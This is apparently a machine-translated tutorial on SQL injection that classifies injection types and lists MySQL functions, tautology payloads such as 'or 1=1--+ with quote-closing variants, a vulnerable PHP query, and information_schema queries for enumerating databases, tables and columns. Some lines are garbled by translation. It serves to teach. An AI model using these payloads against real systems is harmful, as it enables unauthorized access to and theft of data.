Injected classification
Based on the response received from the server
- Error based SQL injection
- SQL Injection for Union Query
- SQL Injection for Heap Queries
- SQL blind injection
Time-based blind SQL injection based on Boolean SQL injection
Error-based blind SQL injection
SQL query (data type) based on how the input is processed
- string based
- number or integer based
Injection based on degree and order (where the impact occurred)
- first-order injection
- second order injection
First-order injection means that the input injection statement directly affects the WEB, and the result appears.
The second-order injection is similar to the stored XSS, which means that the input and submitted statements cannot directly affect the WEB application, and indirectly cause harm to the WEB through other assistants. This is called the second-order injection.
based on the location of the injection point
- Injection of form fields via user input
- Injection via Cookie
- Injection via server variables (header-based injection)
System function
Commonly used functions for database injection
- version()————Database version information
- user() —— database username
- database() --- database name
- @@datadir()————Database path
- @@version_compile_os——OS version
String chaining function
- concat(str1,str2,...) concatenate strings without delimiters
- concat_ws(separator,str1,str2,.....) concatenate strings with separators
- group_concat(str1,str2,....) concatenates all strings of a group and separates each piece of data with a comma
Reference: https://blog.csdn.net/Fly_hps/article/details/80223915
Statements generally used to try
or 1=1--+ 'or 1=1--+ "or 1=1--+ )or 1=1--+ ')or 1=1--+ ") or 1=1--+ "))or 1=1--+The general code is:
id=id=_GET['id']; $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
Two points are considered here:
One is to close the preceding ', and the other is to deal with the following '. Generally, two ideas are used, closing the quotation marks or commenting out, and commenting out the use of --+ or # (%23)
Introduction to the union operator
The union operator is used to combine the result sets of two or more SELECT statements. Note that SELECT statements inside UNION must have the same number of columns. The columns must also have the same data type, and the order of the columns must be the same in each SELECT statement.
SQL union syntax:
SELECT column_name(s) FROM table_name1 UNION SELECT column_name(s) FROM table_name2 Note: By default, the UNION operator selects different values. If duplicate values are allowed, use UNION ALL.
injection process
guess database select schema_name from information_schema.schemata Guess the data table of a library select table_name from information_schema.tables where table_schema='xxxxx' Guess all columns of a table Select column_name from information_schema.columns where table_name='xxxxx' Get the content of a column Select *** from ****